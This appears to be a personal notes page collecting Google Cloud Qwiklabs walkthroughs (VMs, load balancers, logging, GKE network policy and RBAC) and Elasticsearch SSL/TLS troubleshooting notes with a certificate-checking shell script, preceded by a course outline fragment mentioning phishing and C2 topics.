Section 11: Scenario 3 - Phishing Attacks and
-> Golang
-> Gophish
-> C2 Redirectors with AWS Lambda
Section 12: Bonus Scenario - Multiplayer C2

python
go
empire
gophish
mitre ttp documentation

K8s

index.html

Hello world!

testing ground

Note to date.

  • PKCS#12
  • Search Guard 101
  • Elasticsearch & Nginx
  • Quick Start Elastic APM Server & Python Agent
  • Logstash TNT
  • Snapshot/Restore w/ GCS

Google Learning

osdfir.blogspot.com

Google training

Google Cloud introduces VPC Flow Logs for more network visibility.
It provides network telemetry for GCP environments, creating logs in five-second intervals.
Users can collect telemetry from a specific VPC (virtual private cloud) network, a subnet, or a specific VM instance or virtual interface.
=> GSP001 Creating a Virtual Machine
gcloud auth list
gcloud config list project
GCE > new vm > n1-standard-2
gcloud compute instances create gcelab1 --machine-type n1-standard-2 --zone us-central1-c
apt-get update
apt-get install nginx -y
ps auwx | grep nginx
gcloud compute instances create gcelab2 --machine-type n1-standard-2 --zone us-central1-c
gcloud compute ssh gcelab2 --zone us-central1-c

=> GSP002 Getting Started with Cloud Shell & gcloud
Start Cloud Shell
Understanding Regions and Zones
Initializing Cloud SDK
The gcloud CLI is a part of the Google Cloud SDK. You need to download and install the SDK on your own system and initialize it (by running gcloud init) before you can use the gcloud command-line tool.
The gcloud CLI is automatically available in Cloud Shell. Since you're using Cloud Shell for this lab, you don't need to install gcloud manually.

HERE FOR REGIONS AND ZONES DOC:
https://cloud.google.com/compute/docs/regions-zones
europe-west2 is London, with zones a,b,c

Setting environment variables
export PROJECT_ID=qwiklabs-gcp-01-29c2063fd69a
export ZONE=europe-west2-a
echo $PROJECT_ID, $ZONE
Create a virtual machine with gcloud
gcloud compute instances create gcelab2 --machine-type n1-standard-2 --zone $ZONE
Using gcloud commands
gcloud -h
gcloud config --help
gcloud help config
gcloud config list
gcloud config list --all
gcloud components list
Auto-completion
gcloud components install beta
gcloud beta interactive
gcloud compute instances describe gcelab2
SSH into your vm instance
gcloud compute ssh gcelab2 --zone $ZONE
exit
Use the Home directory
cd $HOME
vi ./.bashrc
:wq
=> GSP007 Set Up Network and HTTP Load Balancers
gcloud auth list
gcloud config list project
gcloud config set compute/region europe-west2
gcloud config set compute/zone europe-west2-a
cat << EOF > startup.sh
#! /bin/bash
apt-get update
apt-get install -y nginx
service nginx start
sed -i -- 's/nginx/Google Cloud Platform - '"\$HOSTNAME"'/' /var/www/html/index.nginx-debian.html
EOF

gcloud compute instance-templates create nginx-template \
         --metadata-from-file startup-script=startup.sh

gcloud compute target-pools create nginx-pool

gcloud compute instance-groups managed create nginx-group \
         --base-instance-name nginx \
         --size 2 \
         --template nginx-template \
         --target-pool nginx-pool

gcloud compute instances list
gcloud compute firewall-rules create www-firewall --allow tcp:80
gcloud compute instances list
Now get on via a browser to the external IPs
Create a Network Load Balancer
Create an L3 network load balancer targeting your instance group:
gcloud compute forwarding-rules create nginx-lb \
         --region europe-west2 \
         --ports=80 \
         --target-pool nginx-pool
gcloud compute forwarding-rules list

Create a HTTP(s) Load Balancer
Health checks verify that the instance is responding to HTTP or HTTPS traffic:
gcloud compute http-health-checks create http-basic-check
Define an HTTP service and map a port name to the relevant port for the instance group. Now the load balancing service can forward traffic to the named port:
gcloud compute instance-groups managed \
       set-named-ports nginx-group \
       --named-ports http:80
Create a backend service:
gcloud compute backend-services create nginx-backend \
     --protocol HTTP --http-health-checks http-basic-check --global
Add the instance group into the backend service:
gcloud compute backend-services add-backend nginx-backend \
   --instance-group nginx-group \
   --instance-group-zone europe-west2-a \
   --global
Create a default URL map that directs all incoming requests to all your instances:
gcloud compute url-maps create web-map \
   --default-service nginx-backend
Create a target HTTP proxy to route requests to your URL map:
gcloud compute target-http-proxies create http-lb-proxy \
   --url-map web-map
Create a global forwarding rule to handle and route incoming requests. A forwarding rule sends traffic to a specific target HTTP or HTTPS proxy depending on the IP address, IP protocol, and port specified. The global forwarding rule does not support multiple ports:
gcloud compute forwarding-rules create http-content-rule \
        --global \
        --target-http-proxy http-lb-proxy \
        --ports 80
gcloud compute forwarding-rules list
Take note of the http-content-rule IP_ADDRESS for the forwarding rule, browse to it.
=> GSP112 Cloud (web) Security Scanner: Qwik Start
git clone https://github.com/GoogleCloudPlatform/python-docs-samples
cd python-docs-samples/appengine/standard_python37/hello_world
dev_appserver.py app.yaml
shell > web preview on :8080
gcloud app deploy
[7] europe-west 
gcloud app browse
https://qwiklabs-gcp-04-fa39a019c814.ew.r.appspot.com
Navigation menu > App Engine > Security scans
Enable API > Create scan > update > save > run.
=> GSP282 A Tour of Qwiklabs and the Google Cloud Platform
Compute: houses a variety of machine types that support any type of workload. The different computing options let you decide how involved you want to be with operational details and infrastructure amongst other things.
Storage: data storage and database options for structured or unstructured, relational or non relational data.
Networking: services that balance application traffic and provision security rules amongst other things.
Stackdriver: a suite of cross-cloud logging, monitoring, trace, and other service reliability tools.
Tools: services for developers managing deployments and application build pipelines.
Big Data: services that allow you to process and analyze large datasets.
Artificial Intelligence: a suite of APIs that run specific artificial intelligence and machine learning tasks on the Google Cloud platform.
=> GSP610 Fundamentals of Stackdriver Logging
gcloud auth list
gcloud config list project
git clone https://github.com/GoogleCloudPlatform/getting-started-python
cd getting-started-python/bookshelf
virtualenv -p python3 env
source env/bin/activate
pip3 install -r requirements.txt
gcloud app deploy
[7] europe-west  (supports standard and flexible)
Firestore > Datastore page > SWITCH TO NATIVE MODE, and click SWITCH MODES to confirm.
gcloud app deploy
gcloud app browse
https://qwiklabs-gcp-02-190869f1bc82.ew.r.appspot.com/
create a new book in the app
Select Navigation menu> Logging> Logs Viewer.
GAE Application/All logs/Any log level
In the Filter by label or text search dropdown, select Convert to advanced filter.
`
resource.type="gae_app"
resource.labels.module_id="default"
add protoPayload.latency>=0.01s
`
Still in Logs Viewer, in the select service dropdown, select GAE Application > Default Service > All version_id.
In the log list, click on the status "200" (in any row that has 200) and select Show matching entries. aka protoPayload.status: 200
Create a monitoring metric based on your filter:
User-defined Metrics section > view in Metrics Explorer.
From the left menu, select Monitoring Overview. The log metrics are shown in charts.
Stacked area format looks cool!
Navigation menu > Compute Engine > VM instances.
Create vm g1-small, with HTTP traffic allowed
Viewing audit logs in Activity Viewer
Click on GCP > Activity (https://console.cloud.google.com/home/activity)
Viewing audit logs in Cloud Logs Viewer. Navigation menu > Logging > Logs Viewer
GCE VM Instance > All instance_id
`
resource.type="gce_instance"
`
logs selector dropdown, select cloudaudit.googleapis.com/activity
`
resource.type="gce_instance"
logName="projects/qwiklabs-gcp-02-190869f1bc82/logs/cloudaudit.googleapis.com%2Factivity"
`
remove resource.type="gce_instance"
filter to find and or add by adv Filter
protoPayload.authenticationInfo.principalEmail="[email protected]"
Exporting logs > Creating an export job
Remove line 2, so we just have logName..
Create Sink > name: AuditLogs, service: BigQuery, dest: Create new BigQuery dataset and then name the new BigQuery dataset "AuditLogs" and click Create.
Viewing audit logs in BigQuery. Navigation menu > BigQuery.
find the VM and its auditlogs, now back to the VM, hit edit.
Check the checkbox for Enable connecting to serial ports.
Scroll down and check the checkbox to Allow HTTPS traffic.
Return to the BigQuery console (Navigation menu > BigQuery) and expand the AuditLogs dataset. You might need to refresh the page. You should see that a new cloudaudit table has been created in the dataset. Click the new table.
Click the new cloudaudit table, then click the Query Table button.
`
SELECT
timestamp,
resource.type,
protopayload_auditlog.authenticationInfo.principalEmail,
protopayload_auditlog.methodName
FROM `qwiklabs-gcp-02-190869f1bc82.AuditLogs.cloudaudit_googleapis_com_activity_20200505`
WHERE protopayload_auditlog.authenticationInfo.principalEmail = "[email protected]"
LIMIT 1000
`
=> GSP483 Logging with Stackdriver on Kubernetes Engine
gcloud auth list
gcloud config list project
Open a new session in Cloud Shell. Now open the code editor by clicking the icon in the top ribbon.
gcloud config set project qwiklabs-gcp-04-e9c7a084c5db
git clone https://github.com/GoogleCloudPlatform/gke-logging-sinks-demo
cd gke-logging-sinks-demo
gcloud config set compute/region europe-west
gcloud config set compute/zone europe-west
/home/student_04_33a238f10f2c/gke-logging-sinks-demo/terraform
Remove the provider version for the Terraform from the provider.tf script file.
From the left-hand menu, open the file /gke-logging-sinks-demo/terraform/provider.tf.
Set the version to ~> 2.19.0. After modification your provider.tf script file should look like:
....
provider "google" {
  project = var.project
  version = "~> 2.19.0"
}
Save the file. VI this stuff :shaka:
There are three Terraform files provided with this lab example. The first one, main.tf, is the starting point for Terraform. It describes the features that will be used, the resources that will be manipulated, and the outputs that will result. The second file is provider.tf, which indicates which cloud provider and version will be the target of the Terraform commands--in this case GCP.
The final file is variables.tf, which contains a list of variables that are used as inputs into Terraform. Any variables referenced in the main.tf that do not have defaults configured in variables.tf will result in prompts to the user at runtime.
You will make one small change to main.tf. From the left-hand menu, open the file /gke-logging-sinks-demo/terraform/main.tf. Scroll down to line 106 and find the "Create the Stackdriver Export Sink for Cloud Storage GKE Notifications" section.

Change the filter's resource.type from container to k8s_container.
Do the same for the bigquery-sink below on line 116. Ensure that these two export sync sections look like the following before moving on.
make create
Note: If you get deprecation warnings related to the zone varibale, please ignore it and move forward in the lab.
for me just now it didnt like europe-west, so:
gcloud config set compute/region us-central1
gcloud config set compute/zone us-central1-a
ftw
had to mv terraform.tfvars terraform.tfvars.bak
then
make create :)
make validate
Your output will look like:
kubeconfig entry generated....
Generating Logs
The sample application that Terraform deployed serves up a simple web page. Each time you open this application in your browser the application will publish log events to Stackdriver Logging. Refresh the page a few times to produce several log events.
Navigation menu > Network services > Load balancing > Load balancer details > Frontend
Logs in Stackdriver
Navigation menu > Logging > Kubernetes Container > stackdriver-logging > default (stackdriver-logging is the cluster and default is the namespace).
flip the view the see newest at top, visit the app website few times and see the logging.
Viewing Log Exports. The Terraform configuration built out two Log Export Sinks.
To view the sinks perform the following steps. Stackdriver -> Logging page.
(https://console.cloud.google.com/logs/exports)
You cna edit or create new sinks.
Logs in Cloud Storage. Log events can be stored in Cloud Storage, an object storage system suitable for archiving data. Policies can be configured for Cloud Storage buckets that, for instance, allow aging data to expire and be deleted while more recent data can be stored with a variety of storage classes affecting price and availability.
The Terraform configuration created a Cloud Storage Bucket named stackdriver-gke-logging- to which logs will be exported for medium to long-term archival. In this example, the Storage Class for the bucket is defined as Nearline because the logs should be infrequently accessed in a normal production environment (this will help to manage the costs of medium-term storage). In a production scenario, this bucket may also include a lifecycle policy that moves the content to Coldline storage for cheaper long-term storage of logs.
Storage > Browser > stackdriver-gke-logging-...
Logs in BigQuery. Navigation > BigQuery > gke_logs_dataset (check under here for the logs)
Click on Query Table
have a look at the data.
make teardown

Troubleshooting for your production environment.
1. The install script fails with a Permission denied when running Terraform.
gcloud auth application-default login.
2. Cloud Storage Bucket not populated Once the Terraform configuration is complete the Cloud Storage Bucket will be created, but it is not always populated immediately with log data from the Kubernetes Engine cluster. Give the process some time because it can take up to 2 to 3 hours before the first entries start appearing (https://cloud.google.com/logging/docs/export/using_exported_logs).
=> GSP151 Cloud SQL for MySQL: Qwik Start
Storage > SQL > Create Instance > MySQL > Second Generation
Connect to your instance using the mysql client in the Cloud Shell
gcloud sql connect myinstance --user=root
CREATE DATABASE guestbook;
USE guestbook;
CREATE TABLE entries (guestName VARCHAR(255), content VARCHAR(255),
    entryID INT NOT NULL AUTO_INCREMENT, PRIMARY KEY(entryID));
    INSERT INTO entries (guestName, content) values ("first guest", "I got here!");
INSERT INTO entries (guestName, content) values ("second guest", "Me too!");
SELECT * FROM entries;
=> GSP076 AI Platform: Qwik Start
What you will build
The sample builds a wide and deep model for predicting income category based on United States Census Income Dataset. The two income categories (also known as labels) are:

>50K — Greater than 50,000 dollars
<=50K — Less than or equal to 50,000 dollars
Wide and deep models use deep neural nets (DNNs) to learn high-level abstractions about complex features or interactions between such features. These models then combine the outputs from the DNN with a linear regression performed on simpler features. This provides a balance between power and speed that is effective on many structured data problems.

The sample defines the model using TensorFlow 1.x's prebuilt DNNCombinedLinearClassifier class. The sample defines the data transformations particular to the census dataset, then assigns these (potentially) transformed features to either the DNN or the linear portion of the model.

gcloud auth list
gcloud config list project
Create a virtual environment:
sudo apt-get update
sudo apt-get install virtualenv -y
virtualenv -p python3 venv
source venv/bin/activate
Clone the example repo:
git clone https://github.com/GoogleCloudPlatform/cloudml-samples.git
cd cloudml-samples/census/estimator
Develop and validate your training application locally:
mkdir data
gsutil -m cp gs://cloud-samples-data/ml-engine/census/data/* data/
export TRAIN_DATA=$(pwd)/data/adult.data.csv
export EVAL_DATA=$(pwd)/data/adult.test.csv
head data/adult.data.csv
Install dependencies:
pip install -r ../requirements.txt
pip install pandas==0.24.2
python -c "import tensorflow as tf; print('TensorFlow version {} is installed.'.format(tf.__version__))"
Run a local training job:
export MODEL_DIR=output
gcloud ai-platform local train \
    --module-name trainer.task \
    --package-path trainer/ \
    --job-dir $MODEL_DIR \
    -- \
    --train-files $TRAIN_DATA \
    --eval-files $EVAL_DATA \
    --train-steps 1000 \
    --eval-steps 100
Inspect the summary logs using Tensorboard:
tensorboard --logdir=$MODEL_DIR --port=8080
ls output/export/census/
gcloud ai-platform local predict \
--model-dir output/export/census/<timestamp> \
--json-instances ../test.json
1589229630
GCS:
PROJECT_ID=$(gcloud config list project --format "value(core.project)")
BUCKET_NAME=${PROJECT_ID}-mlengine
echo $BUCKET_NAME
REGION=us-central1
gsutil mb -l $REGION gs://$BUCKET_NAME
gsutil cp -r data gs://$BUCKET_NAME/data
TRAIN_DATA=gs://$BUCKET_NAME/data/adult.data.csv
EVAL_DATA=gs://$BUCKET_NAME/data/adult.test.csv
gsutil cp ../test.json gs://$BUCKET_NAME/data/test.json
TEST_JSON=gs://$BUCKET_NAME/data/test.json
single-instance trainer in the cloud:
JOB_NAME=census_single_1
OUTPUT_PATH=gs://$BUCKET_NAME/$JOB_NAME
gcloud ai-platform jobs submit training $JOB_NAME \
    --job-dir $OUTPUT_PATH \
    --runtime-version 1.14 \
    --python-version 3.5 \
    --module-name trainer.task \
    --package-path trainer/ \
    --region $REGION \
    -- \
    --train-files $TRAIN_DATA \
    --eval-files $EVAL_DATA \
    --train-steps 1000 \
    --eval-steps 100 \
    --verbosity DEBUG
gcloud ai-platform jobs stream-logs $JOB_NAME
gsutil ls -r $OUTPUT_PATH
tensorboard --logdir=$OUTPUT_PATH --port=8080
Deploy your model to support prediction:
MODEL_NAME=census
gcloud ai-platform models create $MODEL_NAME --regions=$REGION
gsutil ls -r $OUTPUT_PATH/export
MODEL_BINARIES=$OUTPUT_PATH/export/census/<timestamp>/
gcloud ai-platform versions create v1 \
--model $MODEL_NAME \
--origin $MODEL_BINARIES \
--runtime-version 1.14 \
--python-version 3.5
gcloud ai-platform models list
Send an online prediction request to your deployed model:
gcloud ai-platform predict \
--model $MODEL_NAME \
--version v1 \
--json-instances ../test.json
=>
=> Google Kubernetes Engine Best Practices: Security
=>

=> GSP480 How to Use a Network Policy on Google Kubernetes Engine
The Principle of Least Privilege
three workloads:

hello-server: this is a simple HTTP server with an internally-accessible endpoint
hello-client-allowed: this is a single pod that repeatedly attempts to access hello-server. The pod is labeled such that the Network Policy will allow it to connect to hello-server.
hello-client-blocked: this runs the same code as hello-client-allowed but the pod is labeled such that the Network Policy will not allow it to connect to hello-serve

three workloads:
1. hello-server: this is a simple HTTP server with an internally-accessible endpoint
2. hello-client-allowed: this is a single pod that repeatedly attempts to access hello-server. The pod is labeled such that the Network Policy will allow it to connect to hello-server.
3. hello-client-blocked: this runs the same code as hello-client-allowed but the pod is labeled such that the Network Policy will not allow it to connect to hello-server.

gcloud auth list
gcloud config list project
git clone https://github.com/GoogleCloudPlatform/gke-network-policy-demo.git
cd gke-network-policy-demo
gcloud config set compute/region us-central1
gcloud config set compute/zone us-central1-a
make setup-project
cat terraform/terraform.tfvars
sed -i 's/~> 2.10.0/~> 2.14.0/g' terraform/provider.tf
make tf-apply
gcloud container clusters describe gke-demo-cluster | grep  -A2 networkPolicy
gcloud compute ssh gke-demo-bastion
kubectl apply -f ./manifests/hello-app/
kubectl get pods
kubectl logs --tail 10 -f $(kubectl get pods -oname -l app=hello)
kubectl logs --tail 10 -f $(kubectl get pods -oname -l app=not-hello)
Restricting access with a Network Policy:
kubectl apply -f ./manifests/network-policy.yaml
kubectl logs --tail 10 -f $(kubectl get pods -oname -l app=not-hello)
Restricting namespaces with Network Policies:
kubectl delete -f ./manifests/network-policy.yaml
kubectl create -f ./manifests/network-policy-namespaced.yaml
kubectl logs --tail 10 -f $(kubectl get pods -oname -l app=hello)
kubectl -n hello-apps apply -f ./manifests/hello-app/hello-client.yaml
validate:
kubectl logs --tail 10 -f -n hello-apps $(kubectl get pods -oname -l app=hello -n hello-apps)
teardown:
exit
make teardown


=> GSP493 Using Role-based Access Control in Kubernetes Engine
gcloud config list project
gcloud config set compute/region us-central1
gcloud config set compute/zone us-central1-a
git clone https://github.com/GoogleCloudPlatform/gke-rbac-demo.git
cd gke-rbac-demo
Edit the file gke-rbac-demo/terraform/provider.tf using the Cloud Shell editor and update the version for Terraform to the latest stable version, 2.12.0
// Configures the default project and zone for underlying Google Cloud API calls
provider "google" {
  project = var.project
  zone    = var.zone
  version = "~> 2.12.0"
}
make create
Assigning permissions by user persona:
gcloud iam service-accounts list
gcloud compute instances list
gcloud compute ssh gke-tutorial-admin
kubectl apply -f ./manifests/rbac.yaml
gcloud compute ssh gke-tutorial-owner
kubectl create -n dev -f ./manifests/hello-server.yaml
kubectl create -n prod -f ./manifests/hello-server.yaml
kubectl create -n test -f ./manifests/hello-server.yaml
kubectl get pods -l app=hello-server --all-namespaces
gcloud compute ssh gke-tutorial-auditor
kubectl get pods -l app=hello-server --all-namespaces
kubectl get pods -l app=hello-server --namespace=dev
kubectl get pods -l app=hello-server --namespace=test
kubectl get pods -l app=hello-server --namespace=prod
kubectl create -n dev -f manifests/hello-server.yaml
kubectl delete deployment -n dev -l app=hello-server
Assigning API permissions to a cluster application:
kubectl apply -f manifests/pod-labeler.yaml
Diagnosing an RBAC misconfiguration:
kubectl get pods -l app=pod-labeler
kubectl describe pod -l app=pod-labeler | tail -n 20
kubectl logs -l app=pod-labeler
Fixing the serviceAccountName:
kubectl get pod -oyaml -l app=pod-labeler
grep serviceAccount pod-labeler-fix-1.yaml --color
admin vm:
kubectl apply -f manifests/pod-labeler-fix-1.yaml
kubectl get deployment pod-labeler -oyaml
insufficient privileges:
pod status:
kubectl get pods -l app=pod-labeler
pod logs:
kubectl logs -l app=pod-labeler
logging:
protoPayload.methodName="io.k8s.core.v1.pods.patch"
Identifying the application's role and permissions:
kubectl get rolebinding pod-labeler -oyaml
inspect role:
kubectl get role pod-labeler -oyaml
grep verbs manifests/pod-labeler-fix-2.yaml --color
kubectl apply -f manifests/pod-labeler-fix-2.yaml
see changes:
kubectl get role pod-labeler -oyaml
kubectl delete pod -l app=pod-labeler
kubectl get pods --show-labels
kubectl logs -l app=pod-labeler
teardown:
make teardown














.

ssl

SSL/TLS troubleshooting script
Elastic Stack v6.3.0

Create and test on single node with P12 (PKCS#12) bundle.

$ egrep '^[^#]+' config/elasticsearch.yml 
cluster.name: moshimoshi
http.port: 9200

$ egrep '^[^#]+' config/kibana.yml 
server.port: 5601
elasticsearch.url: "http://localhost:9200"
$ bin/elasticsearch &
$ bin/kibana &
$ curl localhost:9200
{
  "name" : "jtu_hbG",
  "cluster_name" : "moshimoshi",
  "cluster_uuid" : "AZx4bkBdTOGxrFvlk17hlA",
  "version" : {
    "number" : "6.3.0",
    "build_flavor" : "default",
    "build_type" : "zip",
    "build_hash" : "424e937",
    "build_date" : "2018-06-11T23:38:03.357887Z",
    "build_snapshot" : false,
    "lucene_version" : "7.3.1",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

$ curl -XGET localhost:9200/_xpack/ssl/certificates
[]

Stop Elasticsearch, Kibana.

$ bin/x-pack/certutil ca
$ bin/elasticsearch-certutil ca
$ bin/elasticsearch-certutil cert -ca elastic-stack-ca.p12 

$ mv elastic-* config/

$ ll config/
-rw-------   1 khondhu  staff  3440  9 Jul 17:14 elastic-certificates.p12
-rw-------   1 khondhu  staff  2524  9 Jul 17:14 elastic-stack-ca.p12

Update yaml.

$ egrep '^[^#]+' config/elasticsearch.yml 

cluster.name: moshimoshi
http.port: 9200
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.keystore.path: /Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12
xpack.security.transport.ssl.truststore.path: /Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12
$ bin/elasticsearch &
$ bin/kibana &

SSL Certificate API docs here.

$ curl -XGET localhost:9200/_xpack/ssl/certificates?pretty
[
  {
    "path" : "/Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12",
    "format" : "PKCS12",
    "alias" : "instance",
    "subject_dn" : "CN=instance",
    "serial_number" : "7f17d25c9662dd9306482db4521497ad8f86fd65",
    "has_private_key" : true,
    "expiry" : "2021-07-08T16:14:39.000Z"
  },
  {
    "path" : "/Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12",
    "format" : "PKCS12",
    "alias" : "ca",
    "subject_dn" : "CN=Elastic Certificate Tool Autogenerated CA",
    "serial_number" : "2b683fe55fc0ab03765244cc4f03bbdbd78f4f85",
    "has_private_key" : false,
    "expiry" : "2021-07-08T16:14:07.000Z"
  },
  {
    "path" : "/Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12",
    "format" : "PKCS12",
    "alias" : "instance",
    "subject_dn" : "CN=Elastic Certificate Tool Autogenerated CA",
    "serial_number" : "2b683fe55fc0ab03765244cc4f03bbdbd78f4f85",
    "has_private_key" : false,
    "expiry" : "2021-07-08T16:14:07.000Z"
  }
]

Iteration 1.

$ touch certCheckTool.sh 
$ chmod +x certCheckTool.sh 
$ vi certCheckTool.sh

#!/bin/sh
#title           :certCheckTool.sh
#description     :Script for Elasticsearch cluster SSL/TLS bundle discovery
#author		 :Jymit Singh Khondhu
#date            :7/7/2018
RED='\033[0;31m'
NC='\033[0m' # No Color
USER=whoami


echo "Hello ${RED}${USER} ${NC}";
#echo "The date time right now is: date '+%D %T'"
sleep 1;
printf "The Elasticsearch cluster name is: ";
curl -s -XGET localhost:9200/_cluster/health?pretty |grep -i cluster_name |awk '{print $3}'| cut -f2 -d\"
sleep 2;

#echo "Check if SSL/TLS is enabled"
#sleep 2;
#printf "Getting the output to the _xpack/ssl/certificates API. ";
#sleep 2;
#curl -s -XGET localhost:9200/_xpack/ssl/certificates?pretty

printf "What SSL/TLS bundle is in use here: ";
curl -s -XGET localhost:9200/_xpack/ssl/certificates?pretty |grep format |uniq -c |awk '{print $4}'| cut -f2 -d\"
sleep 2;

echo "The path to the bundle location on node xxx is: "
curl -s -XGET localhost:9200/_xpack/ssl/certificates?pretty |grep path |uniq |awk '{print $3}'| cut -f2 -d\"
sleep 2;
#This needs improvement for multinode enviroments however it gives an indication on where the CA/Cert bundles could reside anyhowi

echo .
sleep 1;
echo .
sleep 1;
echo .
sleep 1;
echo "Please have your ca/cert passphrase at hand"
echo "You are using a PKCS#12 bundle"
echo "So we shall go for: "
curl -s -XGET localhost:9200/_xpack/ssl/certificates?pretty |grep path |uniq |awk '{print $3}'| cut -f2 -d\" |xargs openssl pkcs12 -info -in
$ ./certCheckTool.sh 

Hello whoami 
The Elasticsearch cluster name is: moshimoshi
What SSL/TLS bundle is in use here: PKCS12
The path to the bundle location on node xxx is: 
/Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12
.
.
.
Please have your ca/cert passphrase at hand
You are using a PKCS#12 bundle
So we shall go for: 
Enter Import Password:
MAC Iteration 1024
MAC verified OK
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024
Bag Attributes
    friendlyName: instance
    localKeyID: 54 69 6D 65 20 31 35 33 31 31 35 32 38 38 30 36 36 34 
Key Attributes: <No Attributes>
Enter PEM pass phrase:
PKCS7 Encrypted data: pbeWithSHA1And40BitRC2-CBC, Iteration 1024
Certificate bag
Bag Attributes
    friendlyName: instance
    localKeyID: 54 69 6D 65 20 31 35 33 31 31 35 32 38 38 30 36 36 34 
subject=/CN=instance
issuer=/CN=Elastic Certificate Tool Autogenerated CA
-----BEGIN CERTIFICATE-----
MI
8=
-----END CERTIFICATE-----
Certificate bag
Bag Attributes
    friendlyName: ca
    2.16.840.1.113894.746875.1.1: <Unsupported tag 6>
subject=/CN=Elastic Certificate Tool Autogenerated CA
issuer=/CN=Elastic Certificate Tool Autogenerated CA
-----BEGIN CERTIFICATE-----
MI
Y=
-----END CERTIFICATE-----

.
..
.
..
.
..
.
..
.
Other things to note and work on.

$ bin/elasticsearch-certutil cert --pem
$ unzip certificate-bundle.zip
$ openssl verify -verbose -CAfile ../ca/ca.crt instance.crt
instance.crt: OK

Troubleshooting things to add.
PEM single node cluster v624 SSL/TLS for HTTP & TRANSPORT:

$ egrep '^[^#]+' config/elasticsearch.yml 

cluster.name: khondhu
node.name: khondhu-monitoring
http.port: 9201
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate 
xpack.security.transport.ssl.key: /Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/patwalia-node/patwalia-node.key
xpack.security.transport.ssl.certificate: /Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/patwalia-node/patwalia-node.crt
xpack.security.transport.ssl.certificate_authorities: [ "/Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/ca/ca.crt" ]
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.verification_mode: certificate 
xpack.security.http.ssl.key: /Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/patwalia-node/patwalia-node.key
xpack.security.http.ssl.certificate: /Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/patwalia-node/patwalia-node.crt
xpack.security.http.ssl.certificate_authorities: [ "/Users/khondhu/Desktop/elastic/workSpace/v624/elasticsearch-6.2.4/config/ca/ca.crt" ]

http.

$ curl -s -XGET localhost:9201/_xpack/ssl/certificates?pretty
resp:
[2018-07-10T15:16:13,901][WARN ][o.e.x.s.t.n.SecurityNetty4HttpServerTransport] [khondhu-monitoring] caught exception while handling client http traffic, closing connection [id: 0x3472219b, L:0.0.0.0/0.0.0.0:9201 ! R:/0:0:0:0:0:0:0:1:51494]
io.netty.handler.codec.DecoderException: io.netty.handler.ssl.NotSslRecordException: not an SSL/TLS record: 474554202f5f7

https.

$ curl -s -XGET https://localhost:9201/_xpack/ssl/certificates?pretty
resp:
[2018-07-10T15:20:13,300][WARN ][o.e.x.s.t.n.SecurityNetty4HttpServerTransport] [khondhu-monitoring] caught exception while handling client http traffic, closing connection [id: 0x7eb18cb1, L:0.0.0.0/0.0.0.0:9201 ! R:/0:0:0:0:0:0:0:1:51626]
io.netty.handler.codec.DecoderException: javax.net.ssl.SSLException: Received fatal alert: unknown_ca

with ca.

$ curl --cacert config/ca/ca.crt -XGET https://localhost:9201/
{"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication token for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication token for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}

ca and auth

$ curl --cacert config/ca/ca.crt -uelastic:changeme -XGET https://localhost:9201/
{
  "name" : "khondhu-monitoring",
  "cluster_name" : "khondhu",
  "cluster_uuid" : "Gf92RH6FSWqkc2X4vFqQ1A",
  "version" : {
    "number" : "6.2.4",
    "build_hash" : "ccec39f",
    "build_date" : "2018-04-12T20:37:28.497551Z",
    "build_snapshot" : false,
    "lucene_version" : "7.2.1",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

Add openssl clauses into the script

  • Do you want to verify the PEM cert against your CA. y/n?
    If "y"
    $ openssl verify -verbose -CAfile /ca/ca.crt instance.crt
    instance.crt: OK

Check a PKCS#12 file (.pfx or .p12):
$ openssl pkcs12 -info -in elastic-certificates.p12

$ openssl pkcs12 -info -in config/elastic-certificates.p12 
Enter Import Password:
MAC Iteration 1024
MAC verified OK
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024
Bag Attributes
    friendlyName: instance
    localKeyID: 54 69 6D 65 20 31 35 33 31 31 35 32 38 38 30 36 36 34 
Key Attributes: <No Attributes>
Enter PEM pass phrase:
PKCS7 Encrypted data: pbeWithSHA1And40BitRC2-CBC, Iteration 1024
Certificate bag
Bag Attributes
    friendlyName: instance
    localKeyID: 54 69 6D 65 20 31 35 33 31 31 35 32 38 38 30 36 36 34 
subject=/CN=instance
issuer=/CN=Elastic Certificate Tool Autogenerated CA
-----BEGIN CERTIFICATE-----
MI
8=
-----END CERTIFICATE-----
Certificate bag
Bag Attributes
    friendlyName: ca
    2.16.840.1.113894.746875.1.1: <Unsupported tag 6>
subject=/CN=Elastic Certificate Tool Autogenerated CA
issuer=/CN=Elastic Certificate Tool Autogenerated CA
-----BEGIN CERTIFICATE-----
MI
Y=
-----END CERTIFICATE-----

The key part here is the 2.16.840.1.113894.746875.1.1 This is Oracle's OID for a trusted CA entry in a PKCS#12.

We assume that the PKCS#12 contains the certificate chain. That's usually true, but not always.
